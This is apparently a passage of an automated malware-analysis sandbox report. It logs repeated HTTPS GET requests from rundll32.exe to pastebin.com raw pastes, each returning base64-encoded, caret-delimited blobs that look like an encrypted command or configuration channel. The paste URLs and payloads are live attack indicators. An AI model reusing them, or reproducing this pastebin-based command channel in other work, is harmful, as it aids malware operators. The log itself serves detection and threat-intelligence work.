2024-10-03 01:34:50 UTC	395	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:50 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 7 Last-Modified: Thu, 03 Oct 2024 01:34:43 GMT Server: cloudflare CF-RAY: 8cc9312cfff16a56-EWR
2024-10-03 01:34:50 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 56 69 37 48 74 63 4f 73 51 61 45 65 61 34 2f 38 51 49 49 33 65 48 4a 55 2f 55 65 41 41 6a 67 31 68 32 58 36 57 55 4e 31 6e 62 44 4d 54 63 6d 4b 64 75 46 71 42 33 73 2f 43 67 36 32 6e 78 4d 79 61 32 66 42 6e 4c 67 42 47 69 58 37 37 79 6f 4f 4a 6d 4c 47 74 51 3d 3d 5e 5e 5e 47 35 68 4e 61 55 51 52 4a 30 31 64 4b 38 62 62 77 76 73 59 57 67 3d 3d 5e 5e 5e 30 35 2d 2d 31 32 2d 30 35 5e 5e 5e 51 53 49 73 6e 66 72 37 67 52 6b 4c 48 42 5a 34 42 4c 45 30 72 51 3d 3d 5e 5e 5e 36 76 34 6c 68 6e 6f 36 47 4c 36 56 52 35 4c 69 59 31 50 52 61 52 6b 52 64 2b 4e 32 31 4f 34 38 49 2f 33 4a 61 2b 74 30 69 56 6a 36 4c 47 4f 56 37 61 46 56 70 76 57 72 6f 4e 71 33 71 55 63 4c 65 46 2f 4a 6d 50 65 35 74 35 63 4b 78 7a 58 2b 70 76 37 76 6b 67 3d 3d 5e 5e Data Ascii: 116^^^Vi7HtcOsQaEea4/8QII3eHJU/UeAAjg1h2X6WUN1nbDMTcmKduFqB3s/Cg62nxMya2fBnLgBGiX77yoOJmLGtQ==^^^G5hNaUQRJ01dK8bbwvsYWg==^^^05--12-05^^^QSIsnfr7gRkLHBZ4BLE0rQ==^^^6v4lhno6GL6VR5LiY1PRaRkRd+N21O48I/3Ja+t0iVj6LGOV7aFVpvWroNq3qUcLeF/JmPe5t5cKxzX+pv7vkg==^^
2024-10-03 01:34:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49738	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:51 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:51 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:51 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 12 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc9313188ff196c-EWR
2024-10-03 01:34:51 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49739	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:51 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:51 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:51 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 12 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc931360d318cb9-EWR
2024-10-03 01:34:51 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	49740	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:52 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:52 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:52 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 13 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc9313a8a6b43f9-EWR
2024-10-03 01:34:52 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	49741	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:53 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:53 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:53 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 14 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc9313f6c6fc472-EWR
2024-10-03 01:34:53 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	49743	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:54 UTC	158	OUT	GET /raw/hQqNRrQt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:54 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:54 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 11 Last-Modified: Thu, 03 Oct 2024 01:34:43 GMT Server: cloudflare CF-RAY: 8cc93145ad67424b-EWR
2024-10-03 01:34:54 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 56 69 37 48 74 63 4f 73 51 61 45 65 61 34 2f 38 51 49 49 33 65 48 4a 55 2f 55 65 41 41 6a 67 31 68 32 58 36 57 55 4e 31 6e 62 44 4d 54 63 6d 4b 64 75 46 71 42 33 73 2f 43 67 36 32 6e 78 4d 79 61 32 66 42 6e 4c 67 42 47 69 58 37 37 79 6f 4f 4a 6d 4c 47 74 51 3d 3d 5e 5e 5e 47 35 68 4e 61 55 51 52 4a 30 31 64 4b 38 62 62 77 76 73 59 57 67 3d 3d 5e 5e 5e 30 35 2d 2d 31 32 2d 30 35 5e 5e 5e 51 53 49 73 6e 66 72 37 67 52 6b 4c 48 42 5a 34 42 4c 45 30 72 51 3d 3d 5e 5e 5e 36 76 34 6c 68 6e 6f 36 47 4c 36 56 52 35 4c 69 59 31 50 52 61 52 6b 52 64 2b 4e 32 31 4f 34 38 49 2f 33 4a 61 2b 74 30 69 56 6a 36 4c 47 4f 56 37 61 46 56 70 76 57 72 6f 4e 71 33 71 55 63 4c 65 46 2f 4a 6d 50 65 35 74 35 63 4b 78 7a 58 2b 70 76 37 76 6b 67 3d 3d 5e 5e Data Ascii: 116^^^Vi7HtcOsQaEea4/8QII3eHJU/UeAAjg1h2X6WUN1nbDMTcmKduFqB3s/Cg62nxMya2fBnLgBGiX77yoOJmLGtQ==^^^G5hNaUQRJ01dK8bbwvsYWg==^^^05--12-05^^^QSIsnfr7gRkLHBZ4BLE0rQ==^^^6v4lhno6GL6VR5LiY1PRaRkRd+N21O48I/3Ja+t0iVj6LGOV7aFVpvWroNq3qUcLeF/JmPe5t5cKxzX+pv7vkg==^^
2024-10-03 01:34:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.10	49744	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:54 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:55 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:55 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 16 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc9314a2e061825-EWR
2024-10-03 01:34:55 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.10	49745	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:55 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:55 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:55 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 16 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc9314e8f0f5e5f-EWR
2024-10-03 01:34:55 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.10	49746	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:56 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:56 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:56 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 17 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc931530db8432e-EWR
2024-10-03 01:34:56 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.10	49747	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:57 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:57 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:57 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 18 Last-Modified: Thu, 03 Oct 2024 01:34:39 GMT Server: cloudflare CF-RAY: 8cc931576a556a52-EWR
2024-10-03 01:34:57 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 78 6f 75 77 70 34 4a 6f 65 61 30 55 77 42 62 51 49 46 65 6e 32 59 36 4b 6d 63 4f 4d 71 58 33 67 53 4f 42 67 2b 45 57 4a 35 39 46 43 7a 6d 30 30 78 45 2f 7a 73 47 53 65 59 6e 4d 39 78 46 54 33 33 37 70 50 59 43 36 35 4b 73 2b 48 34 43 52 43 42 49 67 61 6d 77 3d 3d 5e 5e 5e 66 55 6a 62 76 58 74 58 39 51 53 68 37 46 41 61 61 63 4c 55 4e 41 3d 3d 5e 5e 5e 30 37 2d 2d 30 32 2d 30 39 5e 5e 5e 33 43 31 37 78 58 64 63 54 32 37 43 32 75 46 73 6e 72 50 43 46 51 3d 3d 5e 5e 5e 6d 52 73 37 38 55 2f 4b 34 2f 32 61 54 73 32 67 77 46 43 5a 65 37 47 4d 71 73 52 71 62 53 57 51 64 63 76 61 35 51 5a 2f 6f 34 35 65 5a 6e 66 76 50 5a 4d 53 42 72 62 55 52 37 4a 4b 71 47 44 44 50 65 52 62 6f 79 62 47 50 41 56 38 76 43 38 52 56 59 6b 2f 78 77 3d 3d 5e 5e Data Ascii: 116^^^xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==^^^fUjbvXtX9QSh7FAaacLUNA==^^^07--02-09^^^3C17xXdcT27C2uFsnrPCFQ==^^^mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==^^
2024-10-03 01:34:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.10	49749	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:58 UTC	158	OUT	GET /raw/hQqNRrQt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-10-03 01:34:58 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:34:58 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 15 Last-Modified: Thu, 03 Oct 2024 01:34:43 GMT Server: cloudflare CF-RAY: 8cc9315ebcdf8c72-EWR
2024-10-03 01:34:58 UTC	285	IN	Data Raw: 31 31 36 0d 0a 5e 5e 5e 56 69 37 48 74 63 4f 73 51 61 45 65 61 34 2f 38 51 49 49 33 65 48 4a 55 2f 55 65 41 41 6a 67 31 68 32 58 36 57 55 4e 31 6e 62 44 4d 54 63 6d 4b 64 75 46 71 42 33 73 2f 43 67 36 32 6e 78 4d 79 61 32 66 42 6e 4c 67 42 47 69 58 37 37 79 6f 4f 4a 6d 4c 47 74 51 3d 3d 5e 5e 5e 47 35 68 4e 61 55 51 52 4a 30 31 64 4b 38 62 62 77 76 73 59 57 67 3d 3d 5e 5e 5e 30 35 2d 2d 31 32 2d 30 35 5e 5e 5e 51 53 49 73 6e 66 72 37 67 52 6b 4c 48 42 5a 34 42 4c 45 30 72 51 3d 3d 5e 5e 5e 36 76 34 6c 68 6e 6f 36 47 4c 36 56 52 35 4c 69 59 31 50 52 61 52 6b 52 64 2b 4e 32 31 4f 34 38 49 2f 33 4a 61 2b 74 30 69 56 6a 36 4c 47 4f 56 37 61 46 56 70 76 57 72 6f 4e 71 33 71 55 63 4c 65 46 2f 4a 6d 50 65 35 74 35 63 4b 78 7a 58 2b 70 76 37 76 6b 67 3d 3d 5e 5e Data Ascii: 116^^^Vi7HtcOsQaEea4/8QII3eHJU/UeAAjg1h2X6WUN1nbDMTcmKduFqB3s/Cg62nxMya2fBnLgBGiX77yoOJmLGtQ==^^^G5hNaUQRJ01dK8bbwvsYWg==^^^05--12-05^^^QSIsnfr7gRkLHBZ4BLE0rQ==^^^6v4lhno6GL6VR5LiY1PRaRkRd+N21O48I/3Ja+t0iVj6LGOV7aFVpvWroNq3qUcLeF/JmPe5t5cKxzX+pv7vkg==^^
2024-10-03 01:34:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.10	49750	104.20.3.235	443	7540	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:34:59 UTC	158	OUT	GET /raw/ZELZp1Yr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
